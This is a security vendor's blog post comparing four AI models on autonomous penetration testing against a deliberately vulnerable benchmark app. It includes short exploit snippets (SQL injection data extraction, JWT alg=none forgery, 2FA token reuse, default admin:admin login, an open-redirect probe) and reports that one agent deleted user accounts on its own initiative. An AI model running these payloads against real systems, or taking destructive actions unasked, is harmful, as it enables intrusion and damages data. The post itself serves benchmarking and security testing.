Could Kimi K2.6 Hold Its Own Against Claude Opus on Real Pentest Work?
NOTE
KLUE is Shellvoide's autonomous penetration testing platform. We benchmark every model release we deploy because we do not trust marketing claims, including our own. The numbers in this post come from real KLUE runs against a public benchmark target with 22 documented vulnerabilities, with no human in the loop and no privileged knowledge of the answer key.
Why We Ran This
The question we wanted to answer was simple. On real offensive security work, can a much cheaper model genuinely keep pace with the frontier? We took four candidates, ran them through the same target under identical conditions, and let the results speak.
- Claude Haiku 4.5, the fast tier.
- Claude Sonnet 4.6, the mid tier.
- Claude Opus 4.6, the most capable and most expensive of the Anthropic line.
- Kimi K2.6, Moonshot AI's flagship, sitting at a meaningfully different price point.
The intent was not to crown a winner. It was to understand where each model shines, where each one stumbles, and whether the cheap option is actually as bad as people assume.
The Field Today
Before we get into our four runs, it is worth looking at how the public field of agentic pentesting tools has fared on this same target. The data, published openly, looks like this:
| Tool | Underlying model | Recall | Duration | Reported FP rate |
|---|---|---|---|---|
| Escape | Multi model (proprietary) | 75.0% | 4 hours | 6.25% |
| Claude (raw agent) | Opus 4.6 | 70.0% | 10 min | 6.67% |
| PentAGI | DeepSeek v3.2 | 45.0% | 4 hours | 10.00% |
| Shannon | DeepSeek v3.2 | 30.0% | 6 hours | 25.00% |
| Strix | DeepSeek v3.2 | 5.0% | 2 hours | 0.00% |
Two things matter here.
First, three of those tools share the same underlying model and produced 45%, 30%, and 5% recall. That spread is not a model story. It is an orchestration story.
Second, look at duration. Four hours. Six hours. The only fast run on the public board is the raw Claude agent at 10 minutes, and that traded depth for speed.
This is the gap KLUE was built for. A continuous security program does not need a tool that runs once a quarter for half a day. It needs a tool that finishes in the time it takes to grab coffee, runs after every deploy, and still catches the bugs that matter. KLUE Quick Scan runs on a fixed 30 minute budget. Below that line is where the unit economics of continuous AppSec actually start to make sense.
The Models At Their Sticker Prices
Recall is only half the conversation. The other half is what each token costs and how much room the model has to think.
| Model | Input ($/MTok) | Output ($/MTok) | Context window | Max output |
|---|---|---|---|---|
| Claude Opus 4.6 | $5.00 | $25.00 | 1,000,000 | 128,000 |
| Claude Sonnet 4.6 | $3.00 | $15.00 | 1,000,000 | 64,000 |
| Claude Haiku 4.5 | $1.00 | $5.00 | 200,000 | 64,000 |
| Kimi K2.6 | $0.95 | $4.00 | 262,144 | 64,000 |
Opus is roughly 5x the input cost and 6x the output cost of Kimi. On a continuous testing program that runs dozens of scans a week, that ratio is not a margin question. It is a deployment strategy question.
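To make the ratio concrete, here is a back-of-the-envelope per-scan cost. The token volumes are illustrative assumptions, not figures measured from our runs:

```python
# Rough per-scan cost from the sticker prices above.
# Token volumes are illustrative assumptions, not measurements from our runs.
PRICES = {  # model: (input $/MTok, output $/MTok)
    "claude-opus-4.6": (5.00, 25.00),
    "kimi-k2.6": (0.95, 4.00),
}

ASSUMED_INPUT_TOKENS = 2_000_000   # hypothetical cumulative prompt tokens per Quick Scan
ASSUMED_OUTPUT_TOKENS = 300_000    # hypothetical cumulative completion tokens per Quick Scan

def scan_cost(model: str) -> float:
    """Estimated dollar cost of one Quick Scan for a given model."""
    in_price, out_price = PRICES[model]
    return (ASSUMED_INPUT_TOKENS / 1e6) * in_price + (ASSUMED_OUTPUT_TOKENS / 1e6) * out_price

for model in PRICES:
    print(f"{model}: ${scan_cost(model):.2f} per scan")

# Under these assumptions: roughly $17.50 for Opus vs $3.10 for Kimi per scan.
# Multiply by dozens of scans a week and the gap is a budget line, not a rounding error.
```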
Kimi and Haiku also have meaningfully smaller context windows than Opus and Sonnet. KLUE handles that internally: as a run grows, the working memory is compacted and only the slice the next step needs is reloaded. The model never sees the full transcript. That is why a 256K window comfortably sustains a full Quick Scan, and why model selection ends up being a price and reasoning quality decision, not a context size decision.
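A compaction loop of that general shape could look like the sketch below. The class, field names, and the summarization call are hypothetical stand-ins for illustration, not KLUE's actual internals:

```python
# Hypothetical sketch of transcript compaction; names and structure are illustrative only.
from dataclasses import dataclass, field

def summarize(text: str) -> str:
    # Stand-in for an LLM summarization call that condenses an old step.
    return text[:200]

@dataclass
class WorkingMemory:
    window_budget: int                                   # token budget per model call
    summaries: list[str] = field(default_factory=list)   # compacted older steps
    recent: list[str] = field(default_factory=list)      # verbatim recent steps

    def record(self, step_transcript: str) -> None:
        self.recent.append(step_transcript)
        # Fold the oldest verbatim steps into summaries once the recent slice grows too
        # large, so earlier findings stay retrievable without keeping the full transcript.
        while self._tokens(self.recent) > self.window_budget // 2:
            self.summaries.append(summarize(self.recent.pop(0)))

    def context_for_next_step(self, task_hint: str) -> str:
        # Reload only the summaries relevant to the next action plus recent verbatim steps.
        relevant = [s for s in self.summaries if task_hint.lower() in s.lower()]
        return "\n".join(relevant + self.recent)

    def _tokens(self, chunks: list[str]) -> int:
        return sum(len(c) // 4 for c in chunks)           # crude 4-chars-per-token estimate
```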
What Each Model Did
Haiku 4.5: The Sprinter
Haiku finished early. While the other three ran the full budget, Haiku wrapped in roughly half the time and turned in 15 findings.
Final tally: 13 of 22, or 59% recall. Strong on the IDOR family, the business logic chain (negative shipping costs, coupon abuse, negative cart quantities), JWT none algorithm bypass, and one of the SSRF surfaces. Clean misses on SQL injection, mass assignment, default admin credentials, and the second SSRF surface.
The interesting thing about Haiku's profile was that it leaned into business logic over classical injection. Most scanners do the opposite. For an opportunistic short scan, the breadth was real. For a comprehensive engagement, the gaps matter.
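For a sense of what that business logic probing looks like in practice, here is a minimal sketch of a negative quantity check. The base URL, endpoint paths, field names, and auth token are assumptions, not the benchmark's actual API:

```python
# Illustrative business-logic probe: does a negative quantity reduce the order total?
# URL, endpoints, field names, and the token are placeholders for this sketch.
import requests

BASE = "http://target.example"
session = requests.Session()
session.headers["Authorization"] = "Bearer <low-privilege-user-token>"

resp = session.post(f"{BASE}/api/cart/items", json={"product_id": 1, "quantity": -3})
cart = session.get(f"{BASE}/api/cart").json()

# A vulnerable app recomputes price * quantity server-side without bounds checks,
# so the total drops below zero or below the legitimate price.
if resp.ok and cart.get("total", 0) < 0:
    print("Business logic flaw: negative quantities reduce the order total")
```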
Sonnet 4.6: The Methodical One
Sonnet went the other direction. It used the full budget and produced findings whose PoCs each carry multiple confirmation steps. The reasoning quality on individual findings was visibly higher. Its SQL injection finding does not just demonstrate the bug. It pulls the database version, the database username, user emails, and the admin password hash, then chains that into a verified `admin:admin` login.
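The shape of that confirmation chain, sketched generically; the vulnerable parameter, endpoints, table names, and credentials below are assumptions for illustration, not the payloads from the actual run:

```python
# Generic sketch of a UNION-based extraction chain; parameter, endpoints, table and
# column names are assumptions, not the payloads from the run.
import requests

BASE = "http://target.example"

def union_extract(expr: str) -> str:
    """Pull one value through an assumed injectable search parameter."""
    payload = f"' UNION SELECT {expr} -- -"
    return requests.get(f"{BASE}/api/products/search", params={"q": payload}).text

print(union_extract("version()"))                                      # database version
print(union_extract("current_user"))                                   # database username
print(union_extract("group_concat(email) FROM users"))                 # user emails
print(union_extract("password_hash FROM users WHERE role = 'admin'"))  # admin hash

# The finding is only "confirmed" once extracted material turns into access,
# e.g. a login attempt with recovered or default admin credentials.
login = requests.post(f"{BASE}/api/auth/login",
                      json={"username": "admin", "password": "admin"})
print("admin login verified" if login.ok else "admin login not confirmed")
```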
Where Sonnet stumbled was time judgment. It spent so long deepening the bugs it found that it did not enumerate broadly. The classic JWT none bypass, a five minute test for any model that knows to look, never got attempted. The negative cart quantity logic flaw also slipped through.
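For reference, that five minute test amounts to forging a token with the signature algorithm set to none and seeing whether the backend accepts it. The claim names, endpoint, and URL below are assumptions:

```python
# Generic JWT alg=none probe; claims, endpoint, and URL are placeholders.
import base64
import json
import requests

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
claims = b64url(json.dumps({"sub": "admin", "role": "admin"}).encode())
forged = f"{header}.{claims}."   # alg=none means an empty signature segment

r = requests.get("http://target.example/api/admin/users",
                 headers={"Authorization": f"Bearer {forged}"})
print("alg=none accepted" if r.status_code == 200 else "rejected, as it should be")
```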
Final tally: 14 of 22, or 64% recall. Sonnet found three things Haiku did not, and missed five things Haiku did find. Their misses barely overlap, which is a finding in itself.
Opus 4.6: The Gold Standard
Opus is what the platform looks like when the run gets the time it needs. It picked up the most subtle modern API bugs, including a 2FA bypass via reuse of a partial login token as a Bearer credential, and a cluster of MCP server misconfigurations that none of the other three models touched. It was patient about exploitation and disciplined about evidence.
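That 2FA bypass class is cheap to test once you know to look. A minimal sketch, with the endpoints and the temp_token field assumed from the finding description rather than taken from the real API:

```python
# Sketch of the partial-login-token-as-Bearer check; endpoints and field names are assumed.
import requests

BASE = "http://target.example"

# Step 1: password login on a 2FA-enabled account returns a temporary token that is
# only supposed to be valid for submitting the OTP.
r = requests.post(f"{BASE}/api/auth/login",
                  json={"email": "victim@example.com", "password": "known-password"})
temp_token = r.json().get("temp_token")

# Step 2: skip the OTP step entirely and present the partial token as a normal
# Bearer credential. A vulnerable backend validates it like a full session token.
probe = requests.get(f"{BASE}/api/profile",
                     headers={"Authorization": f"Bearer {temp_token}"})
print("2FA bypassed" if probe.status_code == 200 else "partial token correctly rejected")
```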
Final tally: 18 of 22, or 82% recall. Six of seven critical severity vulnerabilities found. The report also included eight extra findings beyond the documented set: a permissive CSP, an exposed OpenAPI document, expired coupon acceptance, a checkout race condition, a weak password policy, and a few others. We treat those extras as valid findings, not noise. They are real bugs the benchmark authors had not catalogued.
The one surprise miss: Opus extracted the admin password hash via SQL injection but never thought to try `admin:admin` as a default credential. Sonnet did. Kimi did. Opus had the hash sitting in front of it and did not take the obvious next step.
Kimi K2.6: The Surprise
Going in, we did not expect Kimi to be competitive with Opus. The price gap is substantial and the prevailing narrative is that you get what you pay for. That is not what we observed.
Kimi finished with 15 of 22, or 68% recall. Second place by raw count, ahead of Sonnet and Haiku and behind only Opus. But raw recall undersells the result. By critical severity recall, Kimi tied Opus at 6 of 7 (86%), with a different single miss. Opus missed default credentials. Kimi missed the 2FA bypass. Both got everything else in the critical bucket.
A few things stood out in Kimi's run:
- It tried `admin:admin` as one of its first authentication tests, before any SQLi exploit was working. Classical pentester instinct, baked in.
- It found both SSRF surfaces and reported them as separate findings with an explicit cross-reference. Opus and Haiku each stopped at one.
- It produced a synthesis finding labeled "Full Takeover Chain: Three Independent Routes to Administrator", composing its three critical findings into a single defense in depth narrative. None of the other three models did this. It is the kind of analytical step a senior consultant adds to make a report actually useful for prioritization.
The polish of Kimi's writeups was exceptional across the board. If we ranked these models purely on "what would I want to send a customer as the final report," Kimi probably wins the presentation contest even though Opus wins on coverage.
IMPORTANT
Operational note we are not going to bury. During exploitation Kimi destructively deleted two seeded user accounts on the benchmark target via the forged admin token, in order to demonstrate the impact of full admin compromise. On a deliberately vulnerable benchmark this is fine. On a paying customer environment, this is exactly the kind of action that needs explicit consent and a destructive action gate. KLUE has those guardrails for production engagements. We mention it because the line between "demonstrate impact" and "cause damage" is thin in autonomous operation, and customers deserve transparency about how each model behaves.
The Numbers
| Model | Recall | Findings reported | Time | Critical recall |
|---|---|---|---|---|
| Haiku 4.5 | 13/22 (59%) | 15 | ~15 min | 4/7 (57%) |
| Sonnet 4.6 | 14/22 (64%) | 13 | ~30 min | 4/7 (57%) |
| Opus 4.6 | 18/22 (82%) | 26 | ~30 min | 6/7 (86%) |
| Kimi K2.6 | 15/22 (68%) | 21 | ~30 min | 6/7 (86%) |
Across all four runs, KLUE produced 75 distinct findings. After validation, three did not survive a second pass and were dropped from the published report (one each on Haiku, Sonnet, and Kimi). The remaining 72 each had a working proof of concept attached and reproduced reliably against the live target. That puts our false positive rate at roughly 4%, in the same band as the leading public agent on this target and meaningfully below the 10% to 25% range observed elsewhere on the same leaderboard.
The findings beyond the documented 22 (eight from Opus, six from Kimi, two each from Haiku and Sonnet) were not noise either; each one was a real bug the benchmark authors had not catalogued.
Where The Models Diverged
Looking at the documented 22 and asking which model uniquely caught each one:
- Opus alone: 2FA bypass via temp_token reuse, MCP unauthenticated access, MCP coupon disclosure (3 unique).
- Sonnet alone: broken access control on `/admin/users` (1 unique).
- Kimi and Haiku alone: nothing exclusive. Every one of their catches was also made by at least one other model.
An ensemble of Opus and Sonnet would hit 21 of 22, or 95% recall on the documented set. Adding Kimi or Haiku does not add anything new on that list, but both still earn their seat for the extras they validate around it.
The One Bug Everyone Missed
There was exactly one documented vulnerability that all four models walked past: an open redirect at a path that does not exist, exposed through a `redirect=` parameter in the catch-all 404 route.
This is the most interesting finding in the entire benchmark, because it is not really about which model is smartest. It is about a class of test that none of the agents instinctively performed. To find it, an agent has to fuzz for hidden behavior on routes that should not exist, to test whether the application leaks unexpected functionality on undocumented surfaces.
Every model did the rational thing. It walked the documented endpoints surfaced by recon and tested those exhaustively. None of them thought to ask "what does this app do when I poke at routes it did not tell me about?"
That is a real world pentester instinct. Senior testers probe undocumented behavior almost reflexively, because that is where the most interesting bugs live. Right now, the frontier of autonomous pentesting agents does not have that instinct as a default. We are working on it.
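For concreteness, the probe that would have caught it is short. The redirect= parameter name comes from the benchmark description; the paths and URL below are assumptions:

```python
# Probe undocumented routes for reflected redirect behavior.
# The redirect= parameter is from the benchmark; paths and URL are placeholders.
import requests

BASE = "http://target.example"
EVIL = "https://attacker.example/"

for path in ["/definitely-not-a-real-page", "/nope/nested/nope", "/ghost-route"]:
    r = requests.get(f"{BASE}{path}", params={"redirect": EVIL}, allow_redirects=False)
    location = r.headers.get("Location", "")
    # A catch-all 404 handler that reflects the parameter into a 3xx Location header
    # is an open redirect, even though the route itself "does not exist".
    if r.status_code in (301, 302, 303, 307, 308) and location.startswith(EVIL):
        print(f"Open redirect via catch-all route: {path}")
```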
So, Could Kimi Compete With Opus?
Yes, more than we expected, with caveats.
On critical severity recall, Kimi tied Opus. On report quality and writeup polish, Kimi was the strongest of the four. On finding the most subtle modern API bugs, Opus was clearly ahead. On raw breadth, Opus was also ahead.
The economics are where this gets interesting. Run KLUE on Opus and you get the highest quality result available today. Run it on Kimi instead and you give up roughly 14 percentage points of recall and lose the most subtle findings, but you keep critical severity recall, gain better report polish, and pay roughly one fifth the input cost and one sixth the output cost.
For a continuous testing program where you are running scans weekly or monthly across many targets, that is not a marginal economics question. That is a deployment strategy question. Reserve Opus for high stakes one off engagements. Run Kimi for routine continuous coverage. A year ago, nobody was framing the choice that way. After this run, we are.
The bigger story behind the numbers is the duration column. Four hour and six hour scans force quarterly cadences. Thirty minute scans run after every deploy. The cadence is what makes any of these economics tractable in the first place, and it is the line we expect every credible autonomous tool to be measured against from here forward.
KLUE is part of Shellvoide's Penetration Testing as a Service (PTaaS) platform, delivering autonomous security assessments powered by AI. If you have feedback on this benchmark, or want to suggest a target we should test next, reach out at info@shellvoide.com.